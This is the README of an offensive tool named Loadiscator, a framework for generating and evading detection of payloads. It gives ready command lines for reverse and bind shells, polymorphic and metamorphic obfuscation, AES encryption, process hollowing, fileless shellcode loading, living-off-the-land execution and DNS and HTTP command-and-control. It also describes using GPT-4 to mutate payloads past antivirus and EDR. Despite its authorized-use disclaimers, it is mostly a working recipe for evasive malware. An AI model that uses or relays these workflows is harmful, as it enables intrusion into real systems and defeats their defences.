
Red Team Payload Generation & Obfuscation Framework
🔐 Advanced AV/EDR Evasion • Adversary Simulation Toolkit
⚠️ For authorized red team operations, AV/EDR evasion research, and educational use only. Do NOT use for unauthorized access or malicious purposes.
- Overview
- Features
- Architecture
- Installation
- Dependencies
- Quick Start
- Command-Line Reference
- Advanced Modules
- Shellcode Generation
- Example Workflows
- Troubleshooting
- FAQ
- Ethical Notice
- Contribution & Support
- Disclaimer
Loadiscator is a modular, extensible framework for generating, obfuscating, and delivering payloads for red team operations, adversary simulation, and AV/EDR evasion research. It supports multiple languages, advanced obfuscation, encryption, fileless execution, and C2 integrations. The framework is designed for both CLI and (optionally) web GUI usage, with a focus on research, education, and authorized security testing.
- Multi-language Payload Generation: Python, Bash, PowerShell, C
- Obfuscation Engines: Base64, XOR, string mangling, polymorphic, metamorphic
- Encryption: AES-256-CBC
- One-liner Encoding: For Python, Bash, PowerShell
- Payload Binding: Bind to decoy files (PDF, EXE, etc.)
- Memory-Only Execution: Fileless shellcode loaders
- Process Hollowing: Run payloads in the context of legitimate processes
- Living-Off-The-Land (LOTL): Use native system tools for stealth
- C2 Integrations: MirageC2, DNS tunneling, HTTP blending
- AI-Powered Optimization: GPT-4 based payload mutation for AV/EDR bypass
- Rich CLI
- Banner and UX Enhancements: Rich ASCII art, colored output
- Extensible: Easily add new payloads, obfuscators, or C2 modules
+-------------------+
|        CLI        |
+-------------------+
          |
+-------------------+
|   Core Modules    |
+-------------------+
| Payload Generator |
| Obfuscators       |
| Encryptors        |
| Encoders          |
| Evasion           |
| C2 Connectors     |
| AI Optimizer      |
| Utils             |
+-------------------+
          |
+-------------------+
|  Output Payloads  |
+-------------------+
- CLI: Fast user interface for all operations (cli.py)
- Core Modules: Modular Python packages for each function
- Output: Final payloads, scripts, and binaries
git clone https://github.com/PardhuSreeRushiVarma20060119/loadiscator.git
cd loadiscator
pip install -r requirements.txt
- For shellcode generation: Python 3.x
- For C2 integration: MirageC2, DNS server, etc.
- typer - CLI framework
- jinja2 - Templating
- cryptography - Encryption
- pycryptodome - Crypto primitives
- rich - Terminal formatting
- openai - AI optimization
- requests - HTTP requests
python -m loadiscator.cli generate python 10.10.10.10 4444 -o reverse.py
python -m loadiscator.cli obfuscate polymorphic --file reverse.py -o poly_reverse.py
python -m loadiscator.cli encrypt --file poly_reverse.py --key "S3cr3tK3y123" -o encrypted.py
python -m loadiscator.cli oneliner --file encrypted.py --lang python
python -m loadiscator.cli generate [LANG] [IP] [PORT] -o [OUTPUT]
- LANG: python, bash, powershell, c
- Example:
python -m loadiscator.cli generate bash 192.168.1.5 9001 -o rev.sh
python -m loadiscator.cli obfuscate [TYPE] --file [INPUT] -o [OUTPUT] [--key KEY]
- TYPE: base64, xor, stringmangle, polymorphic
- Example:
python -m loadiscator.cli obfuscate xor --file rev.sh -o rev_xor.sh --key secret
python -m loadiscator.cli encrypt --file [INPUT] --key [KEY] -o [OUTPUT]
python -m loadiscator.cli oneliner --file [INPUT] --lang [LANG]
python -m loadiscator.cli ai-optimize --file [INPUT] --target [AV] -o [OUTPUT]
- Example:
python -m loadiscator.cli ai-optimize --file reverse.py --target generic -o ai_optimized.py
python -m loadiscator.cli metamorphic --file [INPUT] --iterations [N] -o [OUTPUT]
python -m loadiscator.cli hollow --process [PROCESS] -o [OUTPUT]
- Example:
python -m loadiscator.cli hollow --process notepad.exe -o hollow_payload.py
python -m loadiscator.cli memory-only --shellcode [SHELLCODE.BIN] -o [OUTPUT]
- Example:
python -m loadiscator.cli memory-only --shellcode calc_launcher.bin -o calc_loader.py
python -m loadiscator.cli living-off-land --technique [TECHNIQUE] --payload [PAYLOAD] -o [OUTPUT]
- Techniques: powershell, wmi, registry, schtasks, com, certutil, rundll32
- DNS Tunnel:
python -m loadiscator.cli dns-tunnel --domain [DOMAIN] --server [C2IP] -o [OUTPUT]
- HTTP Blend:
python -m loadiscator.cli http-blend --url [C2URL] -o [OUTPUT]
- Base64: Encodes payloads in base64
- XOR: XORs payloads with a user-supplied key
- String Mangling: Splits and mangles string literals
- Polymorphic: Randomizes code structure, variable names, and adds junk code
- Metamorphic: Deep code transformation, unique build per run
- AES-256-CBC: Strong symmetric encryption for payloads
- One-liner: Converts payloads to single-line scripts for Python, Bash, PowerShell
- Memory-Only Execution: Loads and runs shellcode in memory (no disk write)
- Process Hollowing: Injects payload into a legitimate process
- Living-Off-The-Land: Uses native tools (PowerShell, WMI, etc.) for stealth
- MirageC2: Generates payloads for MirageC2
- DNS Tunnel: C2 over DNS
- HTTP Blend: C2 over HTTP(S)
- GPT-4 Integration: Mutates payloads for AV/EDR evasion
A helper script is included for generating test shellcode:
python generate_shellcode.py reverse 127.0.0.1 4444
python generate_shellcode.py bind 4444
python generate_shellcode.py calc
- Output: .bin files for use with the memory-only loader
Shellcode Types:
- Reverse shell (Windows x64)
- Bind shell (Windows x64)
- calc.exe launcher (Windows x64)
Note: For real operations, use msfvenom, Donut, or other tools to generate production shellcode.
python generate_shellcode.py calc
python -m loadiscator.cli memory-only --shellcode calc_launcher.bin -o calc_loader.py
python -m loadiscator.cli obfuscate polymorphic --file reverse.py -o poly.py
python -m loadiscator.cli metamorphic --file poly.py --iterations 2 -o meta.py
python -m loadiscator.cli ai-optimize --file meta.py --target generic -o final.py
python -m loadiscator.cli living-off-land --technique powershell --payload reverse.py -o lotl_payload.ps1
python -m loadiscator.cli c2-mirage --server http://mirage.local --listener mylistener --key APIKEY123 -o mirage_payload.py
- ImportError: Ensure all dependencies are installed (pip install -r requirements.txt)
- FileNotFoundError: Check that shellcode or payload files exist and paths are correct
- PermissionError: Run as administrator if required (especially for process hollowing)
- OpenAI API Errors: Ensure your API key is set as an environment variable (OPENAI_API_KEY)
- Syntax Errors: Use the correct CLI syntax (dashes, not underscores)
- Use --help with any command for usage info
- Check the output files for errors or incomplete payloads
- Review the logs and console output for stack traces
Q: Is this tool legal to use?
A: Yes — but only for authorized red teaming, security research, or educational purposes. You must have explicit permission before running any generated payloads on a target system. Unauthorized use is illegal and strictly against this project's intent.
Q: Can I add my own payloads or obfuscators?
A: Totally! Loadiscator is modular by design. Just add your logic to loadiscator/payloads/ or loadiscator/obfuscators/. It’s completely your choice, not a requirement, but we truly appreciate contributions from the community. ❤️
Q: Does it support Linux and macOS targets?
A: Yes, many payloads (like Python, Bash) are cross-platform. However, some advanced modules (like memory-only shellcode loaders or process hollowing) are currently Windows-only due to system-specific APIs.
Q: How do I use the AI optimizer?
A: Just set your OpenAI API key as the environment variable OPENAI_API_KEY, then run the ai-optimize command. The tool will use GPT to intelligently mutate your payload for better evasion. It's an experimental but powerful feature — feedback is always welcome!
Q: Can I use real-world shellcode?
A: Yes! While Loadiscator includes a simple generate_shellcode.py for testing, you can also use tools like msfvenom, Donut, or your own C2-generated shellcode. Just pass the .bin file into the memory-only loader.
Q: Is this beginner-friendly?
A: Definitely. The CLI is designed to be intuitive, and the README gives you step-by-step examples. You don’t need to be a red team expert to start learning and using Loadiscator effectively.
Q: I found a bug / have an idea — what should I do?
A: That’s awesome! You can open an issue or submit a pull request. No pressure — but if you do contribute, we’ll make sure to give you credit and ❤️ in the changelog.
This tool is for authorized red team operations, AV/EDR evasion research, and education only. Do not use for unauthorized access or malicious purposes. The authors assume no liability for misuse.
- You are responsible for your actions.
- Always have written authorization before using this tool in any environment.
- Violations may be illegal and result in prosecution.
- PRs and issues welcome!
- For questions, open an issue or contact the maintainer.
- To add new modules, follow the structure in loadiscator/ and submit a pull request.
- For feature requests, describe your use case and desired functionality.
This software is provided for research and educational purposes only. Usage without proper authorization is strictly prohibited. The authors and contributors assume no liability for misuse or damages resulting from the use of this software.
Payload&Obsfucation Framework/
- loadiscator/
  - ai/ # AI-powered payload optimizer
  - binder/ # Payload binding modules
  - c2/ # C2 integrations (Mirage, DNS, HTTP)
  - encoder/ # One-liner encoders
  - encryptors/ # AES encryption
  - evasion/ # Evasion modules (memory-only, hollowing, etc.)
  - obfuscators/ # All obfuscation engines
  - payloads/ # Payload templates (bash, c, python, powershell)
  - utils/ # Utilities (banner, random name, anti-analysis)
  - cli.py # Main CLI entrypoint
- README.md # This documentation
- requirements.txt # Python dependencies
- setup.py # Install script
- generate_shellcode.py # Standalone shellcode generator
- test_*.py # Test scripts
- Create a new file in loadiscator/obfuscators/, e.g., myobfuscator.py.
- Implement a function, e.g., def my_obfuscate(input_file, output_file): ...
- Import and add it to the CLI in cli.py.
- Document usage in the README.
- Never run generated payloads on production or sensitive systems
- Always test in isolated, controlled environments (VMs, sandboxes)
- Use strong, unique encryption keys
- Review output code before deployment
- Keep dependencies up to date
- Inspired by tools like Veil, Unicorn, Donut, and Metasploit
- Thanks to the open-source security community
This project is licensed under the MIT License.
You are free to use, modify, and distribute this project under the terms of the license.
- v1.0: Initial release with multi-language payloads, obfuscation, encryption, and C2 modules
- v1.1: Added AI optimizer, memory-only loader, and advanced evasion
- v1.2: Bug fixes, improved CLI.
I'm actively building open-source cybersecurity tools like MirageC2, PhishVault, and OpenLoRa, and sometimes mini tools like this one.